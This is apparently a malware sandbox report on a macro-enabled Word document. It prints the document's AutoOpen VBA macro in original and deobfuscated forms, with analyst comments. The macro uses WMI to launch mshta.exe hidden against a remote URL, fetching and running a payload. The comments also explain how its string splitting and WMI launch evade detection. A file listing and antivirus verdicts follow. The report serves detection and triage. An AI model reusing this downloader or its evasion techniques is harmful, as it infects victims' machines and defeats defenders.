Static | ZeroBOX

Original


                                        Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' AutoOpen in the ThisDocument module: Word runs a macro with this name when the
' document is opened, provided macros are allowed to run.
' Summary: the Sub connects to the local WMI service, prepares a hidden-window
' startup configuration, and asks WMI to start mshta.exe with a remote HTTPS URL
' as its argument. Nothing else is done in this module.
' Analyst notes:
'   - The WMI moniker and class names are built from string fragments
'     ("win" & "mgmts", "Win32_" & "Process"); presumably this is meant to defeat
'     static matching on the full strings. The concatenations evaluate to the plain
'     "winmgmts:\\.\root\cimv2" and "Win32_Process" / "Win32_ProcessStartup" values.
'   - A process started through Win32_Process.Create is spawned by the WMI provider
'     host (WmiPrvSE.exe), not by WINWORD.EXE, so detections keyed only on
'     "Office application spawns mshta.exe" will not see this launch.
'   - Useful pivots: mshta.exe command lines that contain a URL, Office processes
'     using WMI process creation, and the host name in the command line below.
Sub AutoOpen()
    ' 0 is the ShowWindow value for a hidden window (SW_HIDE).
    Const HIDDEN_WINDOW = 0
    ' "." selects the local computer in the WMI moniker.
    strComputer = "."
    ' Bind to the root\cimv2 namespace on the local machine (moniker assembled from fragments).
    Set objWMIService = GetObject("win" & "mgmts" & ":\\" & strComputer & "\root" & "\cimv2")
    ' Fetch the Win32_ProcessStartup class and create an instance to hold startup settings.
    Set objStartup = objWMIService.get("Win32_" & "Process" & "Startup")
    Set objConfig = objStartup.SpawnInstance_
    ' Hide the window of the process that is about to be created.
    objConfig.ShowWindow = HIDDEN_WINDOW
    ' Bind directly to the Win32_Process class in the same namespace.
    Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root" & "\cimv2" & ":Win32_" & "Process")
    ' Create(CommandLine, CurrentDirectory, ProcessStartupInformation, ProcessId):
    ' mshta.exe is given a remote URL, so it retrieves and runs whatever HTA/script
    ' content that URL serves. Null leaves the working directory unspecified;
    ' intProcessId receives the new process ID. The return code of Create is not
    ' checked, so a failed launch is silent.
    objProcess.Create "C:\Windows\System32\mshta.exe https://service-7pxel2bo-1304343953.gz.apigw.tencentcs.com/picmage", Null, objConfig, intProcessId
End Sub

                                    

Deobfuscated


                                        Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Deobfuscated form of the document's AutoOpen macro: the string fragments have been
' folded into complete literals; the statements and their order are unchanged.
' AutoOpen is run by Word when the document is opened, provided macros are allowed.
' Behaviour: use WMI on the local machine to start mshta.exe, with a hidden window,
' against a remote HTTPS URL. The macro is a downloader/launcher only; any further
' payload comes from the content served at that URL and is not visible here.
' Triage notes:
'   - The full strings "winmgmts:", "Win32_ProcessStartup" and "Win32_Process" are
'     now visible and can be used for static matching on decoded macro source.
'   - Because the launch goes through Win32_Process.Create, the new process is a
'     child of WmiPrvSE.exe rather than of WINWORD.EXE; correlate on the mshta.exe
'     command line and on WMI process-creation activity instead of Office parentage.
'   - The host name in the command line is the network indicator to block and hunt for.
Sub AutoOpen()
    ' ShowWindow value 0 = hidden window (SW_HIDE).
    Const HIDDEN_WINDOW = 0
    ' "." means the local computer.
    strComputer = "."
    ' Connect to the root\cimv2 WMI namespace.
    Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
    ' Get the startup-configuration class and instantiate it.
    Set objStartup = objWMIService.get("Win32_ProcessStartup")
    Set objConfig = objStartup.SpawnInstance_
    ' The created process will have no visible window.
    objConfig.ShowWindow = HIDDEN_WINDOW
    ' Get the Win32_Process class object used to create processes.
    Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
    ' Arguments: command line, current directory (Null), startup configuration,
    ' and an output variable for the process ID. mshta.exe loads and executes the
    ' content returned by the URL. The result of Create is discarded.
    objProcess.Create "C:\Windows\System32\mshta.exe https://service-7pxel2bo-1304343953.gz.apigw.tencentcs.com/picmage", Null, objConfig, intProcessId
End Sub

                                    
_rels/PK
word/_rels/PK
docProps/PK
word/vbaProject.bin
"ukEv~+
Uc)Y4{r
ND+a%5
{?JctEZ}2
word/PK
word/theme/PK
[Content_Types].xml
/L[E'9
_rels/.rels
word/_rels/document.xml.rels
X=c+(\
word/document.xml
word/_rels/vbaProject.bin.relsl
-\Ya;>>
word/theme/theme1.xml
[7I"&h
!9DCm5-
,+d*H
JU[{9A
word/vbaData.xml
B4x^<|
3MnCL[
KnDd/j
word/settings.xml
D9N2N:y
uNOM-2
docProps/app.xml
word/styles.xml
""m\m;3
<W*X{O
e*$cV+
![jD;fK
PzZ1xa
*[VE4a
docProps/core.xml
word/fontTable.xml
word/webSettings.xml
f\US}d
,y0|yh}
_rels/
word/_rels/
docProps/
word/vbaProject.bin
word/theme/
[Content_Types].xmlPK
_rels/.relsPK
word/_rels/document.xml.relsPK
word/document.xmlPK
word/_rels/vbaProject.bin.relsPK
word/theme/theme1.xmlPK
word/vbaData.xmlPK
word/settings.xmlPK
docProps/app.xmlPK
word/styles.xmlPK
docProps/core.xmlPK
word/fontTable.xmlPK
word/webSettings.xmlPK
Antivirus Signature
Bkav Clean
Elastic malicious (high confidence)
DrWeb Clean
MicroWorld-eScan VB.Heur.EmoDldr.32.8881F5CB.Gen
FireEye VB.Heur.EmoDldr.32.8881F5CB.Gen
CAT-QuickHeal Clean
McAfee Clean
Malwarebytes Clean
VIPRE Clean
AegisLab Clean
Sangfor Malware.Generic-Macro.Save.2c7b01cb
Trustlook Clean
BitDefender VB.Heur.EmoDldr.32.8881F5CB.Gen
K7GW Clean
K7AntiVirus Clean
BitDefenderTheta Clean
Cyren PP97M/Downldr.CG.gen!Eldorado
Symantec CL.Downloader!gen87
TotalDefense Clean
TrendMicro-HouseCall Clean
Avast VBA:Downloader-DXY [Trj]
ClamAV Clean
Kaspersky HEUR:Trojan-Downloader.Script.Generic
Alibaba Clean
NANO-Antivirus Trojan.Ole2.Vbs-heuristic.druvzi
ViRobot Clean
Rising Clean
Ad-Aware VB.Heur.EmoDldr.32.8881F5CB.Gen
TACHYON Suspicious/WOX.Obfus.Gen.6
Emsisoft VB.Heur.EmoDldr.32.8881F5CB.Gen (B)
Comodo Clean
F-Secure Heuristic.HEUR/Macro.Downloader.MROF.Gen
Baidu Clean
Zillya Clean
TrendMicro Clean
McAfee-GW-Edition BehavesLike.Downloader.lc
CMC Clean
Sophos Clean
SentinelOne Static AI - Suspicious OPENXML
GData VB.Heur.EmoDldr.32.8881F5CB.Gen
Jiangmin Clean
Avira HEUR/Macro.Downloader.MROF.Gen
Antiy-AVL Clean
Kingsoft Clean
Microsoft Clean
Gridinsoft Clean
Arcabit VB.Heur.EmoDldr.32.8881F5CB.Gen
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan.Win32.Generic
Avast-Mobile Clean
Cynet Malicious (score: 85)
AhnLab-V3 VBA/Downloader.S2
VBA32 Clean
MAX malware (ai score=81)
Zoner Clean
ESET-NOD32 VBA/TrojanDownloader.Agent.NZX
Tencent Clean
Yandex Clean
Ikarus Clean
MaxSecure Clean
Fortinet WM/Agent.D73A!tr
AVG VBA:Downloader-DXY [Trj]
Panda Clean
Qihoo-360 Clean
No IRMA results available.